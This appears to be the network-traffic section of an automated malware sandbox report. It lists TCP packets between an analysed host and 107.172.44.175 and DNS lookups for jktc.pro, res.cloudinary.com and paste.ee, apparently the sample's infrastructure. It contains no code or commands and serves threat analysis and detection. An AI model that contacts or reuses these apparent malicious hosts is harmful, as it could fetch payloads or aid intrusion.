Dec 12, 2024 21:43:25.127765894 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.127810955 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.127860069 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.132308006 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.132355928 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.132389069 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.136761904 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.136836052 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.136873960 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.136905909 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.141252995 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.141323090 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.141390085 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.141433954 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.145847082 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.145912886 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.145941973 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.146006107 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.150284052 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.150352001 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.150352955 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.150388956 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.154903889 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.154973030 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.155035973 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.155071974 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:25.159359932 CET	80	49164	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:25.159431934 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:28.148632050 CET	49164	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:29.818114996 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:29.938095093 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:29.938251019 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:29.951836109 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:30.072046995 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.051784992 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.051843882 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.051882982 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.051922083 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.051956892 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.052187920 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.052226067 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.052248001 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.052263021 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.052269936 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.052300930 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.052308083 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.052345991 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.053201914 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.053256035 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.053262949 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.053296089 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.053323984 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.053349018 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.054312944 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.171879053 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.171950102 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.172017097 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.172051907 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.244029045 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.244085073 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.244101048 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.244143009 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.248039007 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.248090029 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.248161077 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.248212099 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.256532907 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.256589890 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.256674051 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.256716967 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.265050888 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.265115023 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.265131950 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.265177011 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.273432016 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.273492098 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.273571968 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.273623943 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.282016993 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.282083035 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.282186985 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.282227993 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.290481091 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.290541887 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.290574074 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.290617943 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.298892021 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.298948050 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.299069881 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.299120903 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.307337999 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.307419062 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.307424068 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.307471037 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.315810919 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.315865040 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.315881968 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.315921068 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.323478937 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.323594093 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.323595047 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.323635101 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.363979101 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.364062071 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.436865091 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.436933994 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.436959028 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.437005043 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.439281940 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.439333916 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.439377069 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.439415932 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.444334030 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.444391012 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.444391966 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.444436073 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.449383974 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.449443102 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.449451923 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.449486971 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.454394102 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.454462051 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.454549074 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.454598904 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.459187984 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.459239006 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.459343910 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.459408998 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.464123964 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.464174032 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.464277983 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.464329958 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.468904972 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.468971968 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.469050884 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.469096899 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.473786116 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.473823071 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.473854065 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.473891020 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.478559971 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.478621960 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.478641033 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.478691101 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.483447075 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.483488083 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.483524084 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.483555079 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.488194942 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.488269091 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.488302946 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.488358974 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.488379955 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.493037939 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.493091106 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.493125916 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.493180037 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.497807026 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.497858047 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.497873068 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.497911930 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.501646042 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.501707077 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.501713037 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.501765966 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.505530119 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.505639076 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.505642891 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.505690098 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.509402037 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.509459019 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.509489059 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.509530067 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.513118029 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.513175011 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.513222933 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.513262987 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.516999960 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.517039061 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.517047882 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.517076015 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.520889044 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.520941019 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.628825903 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.628914118 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.628938913 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.628969908 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.630315065 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.630419016 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.630486965 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.633404970 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.633457899 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.633493900 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.633538961 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.636564970 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.636612892 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.636646986 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.636686087 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.639738083 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.639813900 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.639898062 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.639935017 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.642594099 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.642638922 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.642687082 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.642720938 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.645476103 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.645524979 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.645541906 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.645572901 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.648201942 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.648258924 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.648264885 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.648291111 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.650980949 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.651058912 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.651082993 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.651117086 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.653750896 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.653795958 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.653866053 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.653902054 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.656594038 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.656650066 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.656725883 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.656763077 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.659570932 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.659581900 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.659625053 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.662230015 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.662309885 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.662316084 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.662343025 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.665050983 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.665096998 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.665124893 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.665158033 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.667812109 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.667855978 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.667906046 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.667941093 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.670651913 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.670725107 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.670739889 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.670783043 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.673445940 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.673515081 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.673544884 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.673584938 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.676317930 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.676368952 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.676378012 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.676407099 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.679214954 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.679263115 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.679302931 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.679344893 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.681941032 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.681991100 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.682058096 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.682101011 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.684747934 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.684820890 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.684848070 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.684885025 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.687572002 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.687616110 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.687681913 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.687720060 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.690401077 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.690486908 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.690511942 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.690532923 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.693607092 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.693660975 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.693662882 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.693690062 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.696062088 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.696140051 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.821145058 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.821218014 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.821422100 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.822293043 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.822357893 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:31.822370052 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:31.822413921 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:36.052393913 CET	80	49165	107.172.44.175	192.168.2.22
Dec 12, 2024 21:43:36.052763939 CET	49165	80	192.168.2.22	107.172.44.175
Dec 12, 2024 21:43:37.684360027 CET	49165	80	192.168.2.22	107.172.44.175

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 21:43:16.696170092 CET	54562	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:16.830482006 CET	53	54562	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:20.605217934 CET	52917	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:20.850251913 CET	53	52917	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:20.851109028 CET	52917	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:20.985182047 CET	53	52917	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:20.985496998 CET	52917	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:21.226619959 CET	53	52917	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:21.226828098 CET	52917	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:21.360857964 CET	53	52917	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:37.046566010 CET	62751	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:37.209444046 CET	57893	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.059612989 CET	54821	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.299524069 CET	53	54821	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:55.299943924 CET	54821	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.433954954 CET	53	54821	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:55.434170008 CET	54821	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.676904917 CET	53	54821	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:55.677093983 CET	54821	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.811922073 CET	53	54821	8.8.8.8	192.168.2.22
Dec 12, 2024 21:43:55.812237978 CET	54821	53	192.168.2.22	8.8.8.8
Dec 12, 2024 21:43:55.947534084 CET	53	54821	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 21:43:16.696170092 CET	192.168.2.22	8.8.8.8	0x6c85	Standard query (0)	jktc.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.605217934 CET	192.168.2.22	8.8.8.8	0x515c	Standard query (0)	jktc.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.851109028 CET	192.168.2.22	8.8.8.8	0x515c	Standard query (0)	jktc.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.985496998 CET	192.168.2.22	8.8.8.8	0x515c	Standard query (0)	jktc.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:21.226828098 CET	192.168.2.22	8.8.8.8	0x515c	Standard query (0)	jktc.pro	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:37.046566010 CET	192.168.2.22	8.8.8.8	0xe4ef	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:37.209444046 CET	192.168.2.22	8.8.8.8	0x232f	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.059612989 CET	192.168.2.22	8.8.8.8	0x20ee	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.299943924 CET	192.168.2.22	8.8.8.8	0x20ee	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.434170008 CET	192.168.2.22	8.8.8.8	0x20ee	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.677093983 CET	192.168.2.22	8.8.8.8	0x20ee	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.812237978 CET	192.168.2.22	8.8.8.8	0x20ee	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 21:43:16.830482006 CET	8.8.8.8	192.168.2.22	0x6c85	No error (0)	jktc.pro		172.67.163.184	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:16.830482006 CET	8.8.8.8	192.168.2.22	0x6c85	No error (0)	jktc.pro		104.21.34.183	A (IP address)	IN (0x0001)	false
